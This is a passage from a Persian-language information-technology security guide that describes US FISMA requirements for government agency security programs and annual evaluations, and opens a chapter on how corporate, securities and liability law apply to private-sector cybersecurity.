ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﺗﺎ ﻓﻮﺭﻳﻪ ۲۰۰۳ﻳﻚ ﺍﺭﺯﻳﺎﺑﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ﻭ ﮔﺎﻣﻬـﺎﻱ ﺩﻳﮕـﺮﻱ ﻧﻴـﺰ
ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺩﺍﺭﻧـﺪ .ﺩﺭ ﻣـﺎﺭﺱ ۲۰۰۱ﺷـﻮﺭﺍﻱ
ﻭﺯﺍﺭﺗــﻲ ﮔــﺴﺘﺮﺵ ﺭﺍﻫﺒــﺮﻱ ﻣﻜــﺎﻧﻴﺰﻩ ﻋﻤــﻮﻣﻲ ٥٧ﺑــﺮﺍﻱ ﺗﻤــﺎﻡ
ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺩﻭﻟﺘﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﻣﻨﺘﺸﺮ ﺳﺎﺧﺖ ٥٨.ﺩﺭ ﺳﺎﻝ ۲۰۰۲ﺯﻣﺎﻧﻴﻜﻪ ﻛﻨﮕﺮﺓ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ
ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪ ﻛﻪ ﺑﺨﺶ ﺍﺟﺮﺍﻳـﻲ ﺩﻭﻟـﺖ ،ﺳـﻄﺢ ﺍﻣﻨﻴﺘـﻲ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻭﻟﺘﻲ ﺭﺍ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﺍﺭﺗﻘﺎ ﻧﺪﺍﺩﻩ ﺍﺳﺖ،
ﻣﺼﻮﺑﺔ ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﻭﻟـﺖ ) ٥٩(FISMAﺭﺍ ﺍﺑـﻼﻍ
ﻛﺮﺩ ﺗﺎ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎ ﻭ ﺭﻭﺷﻬﺎﻱ ﺍﻧﺠـﺎﻡ ﻛـﺎﺭ ﺩﺭ ﺩﻭﻟـﺖ ﺭﺍ ﺭﻭﺷـﻦ
ﻛﻨﺪ ٦٠.ﺩﺭ ﺗﻮﻧﺲ ﻧﻴﺰ ﻣﺸﺎﺑﻪ ﻫﻤﻴﻦ ﻣـﺴﺌﻠﻪ ﺻـﻮﺭﺕ ﭘـﺬﻳﺮﻓﺖ ﻭ
ﺩﻭﻟﺖ ﺩﺭ ﺳﺎﻝ ۲۰۰۲ﻗﻮﺍﻧﻴﻨﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺗﺼﻮﻳﺐ ﻭ ﺍﺑﻼﻍ
ﻛﺮﺩ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻣﻮﻇـﻒ ﺑﻮﺩﻧـﺪ ﺑـﺼﻮﺭﺕ
ﺳﺎﻟﻴﺎﻧﻪ ﻣﻮﺭﺩ ﻣﻤﻴﺰﻱ ٦١ﺳﺎﻟﻴﺎﻧﺔ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٤٢
ﺍﻓﺸﺎﺳﺎﺯﻱ ،ﺍﺧﺘﻼﻝ ،ﺗﻐﻴﻴﺮ ،ﻳﺎ ﭘﺎﻙ ﻛﺮﺩﻥ( ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﻭﺍﻗـﻊ
ﺷﻮﺩ؛
•
ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ:
oﺑﺮ ﺍﺳﺎﺱ ﻓﺮﺁﻳﻨﺪ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻫﺴﺘﻨﺪ؛
oﻣﻨﺠﺮ ﺑﻪ ﻛﺎﻫﺶ ﻫﺰﻳﻨﻪﻫـﺎﻱ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ
ﻣﻲﺷﻮﻧﺪ؛
oﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﭼﺮﺧـﺔ
ﺣﻴﺎﺕ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ ﺑـﺼﻮﺭﺕ
ﻛﺎﻣﻞ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؛ ﻭ
oﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛـﻪ ﺍﻟﺰﺍﻣـﺎﺕ ﻭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ
٦٥
ﺍﻣﻨﻴﺘﻲ ﺍﺩﺍﺭﺓ ﻣـﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟـﻪ ﺭﻳـﺰﻱ )،OMB
ﺑﺨﺸﻲ ﺍﺯ ﺩﻓﺘﺮ ﺍﺟﺮﺍﻳﻲ ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ( ﺑﺮﺁﻭﺭﺩﻩ ﻣﻲﺷﻮﺩ؛
•
ﺗﻬﻴــﺔ ﻃﺮﺣﻬــﺎﻱ ﻓﺮﻋــﻲ ﺑــﺮﺍﻱ ﻓــﺮﺍﻫﻢ ﻛــﺮﺩﻥ ﺍﻣﻨﻴــﺖ
ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﻄﺢ ﻛﺎﻓﻲ ﺑـﺮﺍﻱ ﺷـﺒﻜﻪﻫـﺎ ،ﺍﻣﻜﺎﻧـﺎﺕ ،ﻭ
ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﮔﺮﻭﻫﻬﺎﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ؛
•
ﺑﺮﮔﺰﺍﺭﻱ ﺩﻭﺭﻩﻫﺎﻱ ﺁﻣﻮﺯﺷﻲ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘﻲ
ﻛﺎﺭﻛﻨـــﺎﻥ ﺳـــﺎﺯﻣﺎﻥ ،ﭘﻴﻤﺎﻧﻜـــﺎﺭﺍﻥ ﻭ ﺳـــﺎﻳﺮ ﻛـــﺎﺭﺑﺮﺍﻥ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﺳﺎﺯﻣﺎﻥ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ؛
•
ﺁﺯﻣﻮﺩﻥ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺘﻨﺎﻭﺏ ﺍﺛﺮﺑﺨﺸﻲ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ
ﺍﻃﻼﻋــﺎﺕ ،ﺭﻭﺍﻟﻬــﺎ ﻭ ﺗﺠﺮﺑﻴــﺎﺕ ،ﻛــﻪ ﺷــﺎﻣﻞ ﺁﺯﻣــﻮﺩﻥ
ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ،ﻋﻤﻠﻜﺮﺩﻱ ﻭ ﻓﻨﻲ ﻣﻲﺑﺎﺷﺪ؛
•
ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺑﺮﺍﻱ ﻃﺮﺍﺣﻲ ،ﺍﺟﺮﺍ ،ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﻣـﺴﺘﻨﺪﺳﺎﺯﻱ
ﻋﻤﻠﻴﺎﺕ ﻧـﺎﮔﺰﻳﺮﻱ ﺑـﺮﺍﻱ ﺟﺒـﺮﺍﻥ ﻧﻘـﺎﺋﺺ ﺩﺭ ﺳﻴﺎﺳـﺘﻬﺎ،
ﺭﻭﺍﻟﻬﺎ ،ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺗﻲ ﺳﺎﺯﻣﺎﻥ؛
•
ﺭﻭﺍﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ،ﮔـﺰﺍﺭﺵ ﻭ ﭘﺎﺳـﺦ ﺑـﻪ ﻭﻗـﺎﻳﻊ
ﺍﻣﻨﻴﺘﻲ؛ ﻭ
•
ﻃﺮﺣﻬــﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻳﻲ ﺑــﺮﺍﻱ ﺍﻃﻤﻴﻨــﺎﻥ ﺍﺯ ﺗــﺪﺍﻭﻡ ﻓﻌﺎﻟﻴــﺖ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺳﺎﺯﻣﺎﻥ.
ﻋﻤﻠﻜﺮﺩﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻃﺮﺣﻬـﺎ ﻭ ﮔﺰﺍﺭﺷـﺎﺕ ﺩﻳﮕـﺮ ﻧﻴـﺰ
ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﺩ؛ ﺍﺯ ﺟﻤﻠـﻪ ﺁﻧﺪﺳـﺘﻪ ﻛـﻪ ﻭﺍﺑـﺴﺘﻪ ﺑـﻪ ﺑﻮﺩﺟـﺔ
ﺳﺎﻟﻴﺎﻧﺔ ﺳﺎﺯﻣﺎﻥ ،ﻣﺪﻳﺮﻳﺖ ﻣﺎﻟﻲ ،ﺣﺴﺎﺑﺮﺳﻲ ﺩﺍﺧﻠﻲ ﻭ ﻛﻨﺘﺮﻟﻬـﺎﻱ
ﺭﺍﻫﺒـﺮﻱ ﻫــﺴﺘﻨﺪ .ﭼﻨﺎﻧﭽــﻪ ﺩﺭ ﺳﻴﺎﺳــﺘﻬﺎ ،ﺭﻭﺍﻟﻬــﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫــﺎ
ﻫﺮﮔﻮﻧﻪ ﺍﺷﻜﺎﻟﻲ ﭘﻴﺪﺍ ﺷﻮﺩ ﺑﺎﻳﺪ ﺍﻳﻦ ﺍﺷﻜﺎﻝ ﺑﻪ ﺍﺩﺍﺭﺓ ﻣـﺪﻳﺮﻳﺖ ﻭ
ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﻭ ﻛﻨﮕﺮﻩ ﮔﺰﺍﺭﺵ ﮔﺮﺩﺩ.
ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳـﺪ ﻫﻤـﻪﺳـﺎﻟﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﺍﻣﻨﻴﺘـﻲ ﻣـﺴﺘﻘﻠﻲ ﺭﺍ ﺑـﺮﺍﻱ
ﻣﺸﺨﺺ ﻛﺮﺩﻥ ﺗﺄﺛﻴﺮ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋـﺎﺗﻲ ﻭ ﻋﻤﻠﻜﺮﺩﻫـﺎﻱ
ﺧﻮﺩ ﺍﺭﺍﺋـﻪ ﺩﻫﻨـﺪ .ﻫـﺮ ﺍﺭﺯﻳـﺎﺑﻲ ﺩﻭ ﻗـﺴﻤﺖ ﺩﺍﺭﺩ :ﻗـﺴﻤﺖ ﺍﻭﻝ
ﺑﺮﺭﺳــﻲ ﺗــﺄﺛﻴﺮ ﺳﻴﺎﺳــﺘﻬﺎ ،ﻓﺮﺁﻳﻨــﺪﻫﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫــﺎﻱ ﺍﻣﻨﻴــﺖ
ﺍﻃﻼﻋﺎﺗﻲ ﻳﻚ ﺯﻳـﺮﺑﺨﺶ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺳـﺎﺯﻣﺎﻥ؛ ﻭ
ﻗﺴﻤﺖ ﺩﻭﻡ ﻳﻚ ﺍﺭﺯﻳـﺎﺑﻲ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ،ﺭﻭﺍﻟﻬـﺎ ،ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ
٦٦
ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺗﺒﻂ.
FISMAﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺗﻤﺎﻣﻲ ﺳﻴﺎﺳـﺘﻬﺎ
ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ،ﻧﻤﺎﻳﻨﺪﺓ ﺍﺩﺍﺭﺓ ﻣﺪﻳﺮﻳﺖ ﻭ
ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨـﺪ ﻛـﻪ ﺗﻬﻴـﻪ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻫﻤـﺔ
ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺳﺮﭘﺮﺳـﺘﻲ ﻛﻨـﺪ.
FIMSAﻫﻤﭽﻨــﻴﻦ ﺑــﺮﺍﻱ ﺗﻬﻴــﻪ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ،ﺭﺍﻫﺒﺮﺩﻫــﺎ ﻭ
ﭘﻴﺸﻨﻴﺎﺯﻫﺎﻱ ﺣﺪﺍﻗﻠﻲ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ٦٧،ﺍﺧﺘﻴـﺎﺭﺍﺕ ﻻﺯﻡ ﺭﺍ ﺑـﻪ
ﻣﺆﺳﺴﻪ ﻣﻠﻲ ﻋﻠـﻮﻡ ﻭ ﻓﻨـﺎﻭﺭﻱ ﻭﺍﮔـﺬﺍﺭ ﻛـﺮﺩﻩ ﻭ ﻧﻤﺎﻳﻨـﺪﺓ ﺍﺩﺍﺭﺓ
ﻣﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺁﻭﺭﺩﻩ ﺷـﺪﻥ ﺍﻳـﻦ
ﻧﻴﺎﺯﻫﺎ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﻨﺪ ﻭ ﺣﺪﺍﻗﻞ ﺳﺎﻟﻲ ﻳﻜﺒﺎﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴـﺖ
ﺍﻃﻼﻋــﺎﺕ ﺳــﺎﺯﻣﺎﻥ ﺭﺍ ﻣــﺮﻭﺭ ﻭ ﺍﺻــﻼﺡ ﻧﻤﺎﻳــﺪ .ﻧﻤﺎﻳﻨــﺪﺓ ﺍﺩﺍﺭﺓ
ﻣﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﻣﺴﺌﻮﻝ ﺍﺭﺍﺋﻪ ﮔﺰﺍﺭﺵ ﺳـﺎﻟﻴﺎﻧﻪ ﺩﺭ ﻣـﻮﺭﺩ
٦٨
ﺑﺎﺯﺩﻩ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﻛﻨﮕﺮﻩ ﻣﻲﺑﺎﺷﺪ.
ﺩﺭ ﺧــﺼﻮﺹ ﻛﻔﺎﻳــﺖ ﻭ ﺍﺛﺮﺑﺨــﺸﻲ ﺳﻴﺎﺳــﺘﻬﺎ ،ﻓﺮﺁﻳﻨــﺪﻫﺎ ﻭ
ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻴﺰﺍﻥ ﺗﻄﺎﺑﻖ ﺁﻧﻬﺎ ﺑﺎ
ﻋﻨﺎﺻﺮ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ،ﻫﺮ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﻳـﺪ
ﺑــﻪ ﻧﻤﺎﻳﻨــﺪﺓ ﺍﺩﺍﺭﺓ ﻣــﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟــﻪﺭﻳــﺰﻱ ﻭ ﻛﻤﻴﺘــﻪﻫــﺎﻱ
ﻛﻨﮕﺮﻩﺍﻱ ،ﻳﻚ ﮔـﺰﺍﺭﺵ ﺳـﺎﻟﻴﺎﻧﻪ ﺍﺭﺍﺋـﻪ ﻧﻤﺎﻳـﺪ .ﺑﻌـﻼﻭﻩ ﻣﻴـﺰﺍﻥ
ﻛﻔﺎﻳﺖ ﻭ ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ،ﺭﻭﻧـﺪﻫﺎ ﻭ
Office of Management and Budget
65
Title 44, United States Code, section 3545
Title 40, United States Code, section 11331
Title 44, United States Code, section 3543
66
67
68
٢٤٣
ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﻓﺼﻞ ﺳﻮﻡ
ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺑﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ
ﺍﻧﺘﻘﺎﻝ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺳﻨﺘﻲ
ﺑﻪ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ
ﻋﻼﻭﻩ ﺑﺮ ﻓﺸﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻃـﺮﻑ ﺑـﺎﺯﺍﺭ ﺑـﺮﺍﻱ ﺑـﺮﺁﻭﺭﺩﻩ ﻛـﺮﺩﻥ
ﺍﻣﻨﻴﺖ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻣﻲﺁﻳﺪ ،ﻗﻮﺍﻧﻴﻦ ﻧﻴﺰ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺍﻳـﻦ
ﺯﻣﻴﻨﻪ ﻳﻚ ﻋﺎﻣﻞ ﺍﻧﮕﻴﺰﺷﻲ ﺑﺎﺷﻨﺪ .ﺷـﺮﻛﺘﻬﺎ ﺑـﺎ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ
ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺑﺮﺁﻣﺪﻩ ﺍﺯ ﻣﻔﺎﻫﻴﻢ ﺳـﻨﺘﻲ ﭼـﻮﻥ ﻗـﻮﺍﻧﻴﻦ ﺷـﺮﻛﺘﻬﺎ،
ﻗﻮﺍﻧﻴﻦ ﻗﺮﺍﺭﺩﺍﺩﻫﺎ ﻭ ﻗﻮﺍﻧﻴﻦ ﭘﺎﺳﺨﮕﻮ ﺑﻮﺩﻥ )ﺑـﺮﺍﻱ ﺟﺒـﺮﺍﻥ ﺧـﺴﺎﺭﺍﺕ
ﻋﻤﺪﻱ ﻭ ﻏﻴﺮﻋﻤﺪﻱ( ﻣﻮﺍﺟﻪ ﺷﺪﻩﺍﻧﺪ .ﺁﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻗﻮﺍﻧﻴﻦ ﺟﺪﻳﺪﺗﺮ
ﻧﻈﻴﺮ ﺛﺒﺖ ﻭ ﻓﺮﻭﺵ ﺍﻣﻦ ﺍﻭﺭﺍﻕ ﺑﻬـﺎﺩﺍﺭ ﺩﺭ ﻣﺒـﺎﺩﻻﺕ ﻋﻤـﻮﻣﻲ ﻭ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻣﻌﺎﻣﻼﺕ ﻓﺮﻳﺒﻨـﺪﻩ ﻭ ﻧﺎﻋﺎﺩﻻﻧـﻪ ﺗﺠـﺎﺭﻱ ﺭﺍ ﭘـﻴﺶ
ﺭﻭﻱ ﺧﻮﺩ ﻣﻲﺑﻴﻨﻨﺪ .ﻧﺤـﻮﺓ ﺗﻄﺒﻴـﻖ ﺍﻳـﻦ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺳـﻨﺘﻲ
ﻗﺎﻧﻮﻧﻲ ﺑﻪ ﺣﻮﺯﺓ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻮﺟﻪ ﻭ ﺗـﻼﺵ ﺯﻳـﺎﺩﻱ ﺭﺍ
ﻣﻌﻄﻮﻑ ﺧﻮﺩ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻗﺎﻧﻮﻧﮕﺬﺍﺭ ﺑﺎ
ﻭﺿﻊ ﻗﻮﺍﻧﻴﻦ ﻋﻤﻮﻣﻲ ﻳﺎ ﺻﺪﻭﺭ ﺑﺨﺸﻨﺎﻣﻪﻫـﺎ ﻭ ﺁﻳـﻴﻦﻧﺎﻣـﻪﻫـﺎﻱ
ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻨﻜﻪ ﭼﻨـﻴﻦ ﺿـﻮﺍﺑﻄﻲ ﺣﺘـﻲ ﺩﺭ ﻗـﻮﺍﻧﻴﻦ ﻛـﺸﻮﺭﻫﺎﻱ
ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻧﻴﺰ ﺑﻨﺪﺭﺕ ﻳﺎﻓﺖ ﻣـﻲ ﺷـﻮﺩ ،ﺑﺨـﺸﻲ ﺍﺯ ﺗﻼﺷـﻬﺎﻱ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻭ ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ ﻫﺮ ﻛﺸﻮﺭ ﺍﻋﻢ ﺍﺯ ﺗﻮﺳـﻌﻪﻳﺎﻓﺘـﻪ ﻭ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎﻳﺪ ﺻـﺮﻑ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷـﻮﺩ
)ﻣﺴﺎﺋﻠﻲ ﻧﻈﻴﺮ ﺗﻮﺟﻪ ﺑـﻪ ﭼﮕـﻮﻧﮕﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻔـﺎﻫﻴﻢ ﻗـﺎﻧﻮﻧﻲ ﺳـﻨﺘﻲ ﺩﺭ
ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ(.
ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺭﻭﺷﻬﺎﻳﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣـﻲ ﺩﻫـﻴﻢ ﻛـﻪ ﺩﺭ
ﺁﻧﻬﺎ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻗﻮﺍﻧﻴﻦ ﻋﻤﻮﻣﻲ ﺁﻧﭽﻨﺎﻥ ﺗﻮﺳﻌﻪ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ ﻛﻪ
ﺑﺘﻮﺍﻧﻨﺪ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﺑﻜﺎﺭ ﺭﻭﻧﺪ .ﺩﺭ ﻓﺼﻞ ﭼﻬﺎﺭﻡ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺻﺮﻓﹰﺎ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ
ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻧﻴﺰ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
ﻗﻮﺍﻧﻴﻦ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﺩﺍﺭﺓ ﺳﺎﺯﻣﺎﻥ،
ﺣﺴﺎﺑﺪﺍﺭﻱ ،ﻭ ﺛﺒﺖ ﻭ ﻓﺮﻭﺵ ﺍﻭﺭﺍﻕ ﺑﻬﺎﺩﺍﺭ
ﻃﺒﻖ ﻗﻮﺍﻧﻴﻦ ﺳﺎﺯﻣﺎﻥ ،ﻣـﺪﻳﺮﺍﻥ ﻭ ﻣـﺴﺌﻮﻻﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ
ﻗﺒﺎﻝ ﺳﺎﺯﻣﺎﻥ ﻭ ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺁﻥ ﺗﻌﻬﺪ ﻛﻨﻨﺪ ﻛﻪ ﭘﻴﺶﺑﻴﻨﻲ ﺩﻗﻴﻘﻲ
ﺍﺯ ﻋﻤﻠﻴﺎﺕ ﺗﺠﺎﺭﻱ ﺳـﺎﺯﻣﺎﻥ ﺍﺭﺍﺋـﻪ ﻧﻤﺎﻳﻨـﺪ .ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑﻄـﻮﺭ
ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺩﺭﺣﺎﻝ ﺟﺎ ﺍﻓﺘﺎﺩﻥ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﭘـﻴﺶﺑﻴﻨـﻲ ،ﺷـﺎﻣﻞ
ﻣﻮﺿــﻮﻋﺎﺗﻲ ﭼــﻮﻥ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻧﻴــﺰ ﻣــﻲﺷــﻮﺩ .ﺑﺮﺧــﻲ
ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻣﺘﺬﻛﺮ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺍﮔﺮ ﻣﺪﻳﺮﺍﻥ ﺍﺯ ﺑﺮﺩﺍﺷﺘﻦ ﮔﺎﻣﻬﺎﻱ
ﻣﻨﺎﺳــﺐ ﺑــﺮﺍﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﺗﻬﺪﻳــﺪﺍﺕ ﺍﻣﻨﻴﺘــﻲ ﺧــﻮﺩﺩﺍﺭﻱ ﻛﻨﻨــﺪ،
ﺩﺭﺻﻮﺭﺕ ﻣﺘﻀﺮﺭ ﺷﺪﻥ ،ﺩﺭ ﻗﺒﺎﻝ ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺷـﺮﻛﺖ ،ﻣـﺴﺌﻮﻝ
ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ.
ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﻳﻦ ﻧﻮﻉ ﻭﻇﺎﻳﻒ ﻛﻪ ﺑﺮﺧﺎﺳﺘﻪ ﺍﺯ ﻗـﻮﺍﻧﻴﻦ ﻋـﺎﻡ
